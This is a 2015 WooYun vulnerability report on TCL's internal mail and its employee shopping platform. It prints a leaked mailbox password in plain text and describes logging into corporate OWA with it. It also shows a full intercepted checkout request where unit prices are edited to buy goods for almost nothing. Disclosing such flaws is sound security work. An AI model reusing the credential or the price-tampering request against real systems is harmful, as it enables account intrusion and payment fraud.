当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0136129

漏洞标题:TCL内部邮箱密码泄露及某处逻辑支付漏洞(影响公司财产安全)

相关厂商:TCL官方网上商城

漏洞作者: hecate

提交时间:2015-08-22 20:00

修复时间:2015-10-08 08:46

公开时间:2015-10-08 08:46

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-22: 细节已通知厂商并且等待厂商处理中
2015-08-24: 厂商已经确认,细节仅向厂商公开
2015-09-03: 细节向核心白帽子及相关领域专家公开
2015-09-13: 细节向普通白帽子公开
2015-09-23: 细节向实习白帽子公开
2015-10-08: 细节向公众公开

简要描述:

TCL内部邮箱密码泄露及某处逻辑支付漏洞(影响公司财产安全)

详细说明:

1.这是由于官方忽略漏洞导致的:
WooYun: TCL某站弱口令导致5000+员工信息暴露(姓名/工号/身份证/电话/邮箱/专业/职位等...)
最下面有这张图片


可以看到邮箱用户名为 [email protected]
密码为 1qazXSW@
2.尝试登录此邮箱
地址 https://mail.tcl.com/owa/

Screenshot - 2015年08月22日 - 17时17分23秒.png


登录成功!
3.来到内部员工直销平台http://ego.tcl.com.cn/DRP/
登录不上,必须先注册一个

Screenshot - 2015年08月22日 - 17时06分10秒.png


注册的用户名和密码同邮箱
成功登录

Screenshot - 2015年08月22日 - 16时48分07秒.png


4.购买电器的价格参数可修改
选几样添加到购物车

1.jpg


这时打开burp抓包,点击结算,抓包内容如下

POST /DRP/shopping/toBalanceShoppingCart HTTP/1.1
Host: ego.tcl.com.cn
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://ego.tcl.com.cn/DRP/shopping/findMyShoppingCart?etc=1440233549319
Cookie: JSESSIONID=4523FF21C3AFADF5395880D2EA74E798
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 684
chiefOrderVo.order.provinceId=P0001&chiefOrderVo.order.cityId=S0001&chiefOrderVo.order.countryId=110200&productInfo=010138012142%3A%3A%E5%BD%A9%E7%94%B5-65%E5%AF%B8-L65E6800A-UD%3A%3A★10%2C270★%3A%3A0%3A%3A153%3A%3A100%3A%3A222222222G1507010001%3A%3ACDD8D6A10A0303985010757BE07BFB55%23%23010138013832%3A%3A%E5%BD%A9%E7%94%B5-65%E5%AF%B8-Q65H9700%3A%3A★14%2C286★%3A%3A0%3A%3A37%3A%3A10%3A%3A222222222G1507010001%3A%3ACDD8D69E0A030398351373F3C0911880%23%23010138011542%3A%3A%E5%BD%A9%E7%94%B5-65%E5%AF%B8-L65E5800F%3A%3A★6%2C786★%3A%3A0%3A%3A105%3A%3A100%3A%3A222222222G1507010001%3A%3ACDD8D6A20A030398116B26FF378DB64E%23%23&chiefOrderVo.order.agreeSubsidy=N&chiefOrderVo.order.businessManId=


五角星标注的是商品单价,可以修改

2.jpg


原本199万改成720

3.jpg


提交成功,查看下订单

4.jpg

漏洞证明:

见详细说明

修复方案:

发现订单价格异常,可以直接报错,拒绝继续运行

版权声明:转载请注明来源 hecate@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-08-24 08:44

厂商回复:

感谢您对TCL集团的关注,我们正联系开发人员对系统漏洞进行修改。

最新状态:

暂无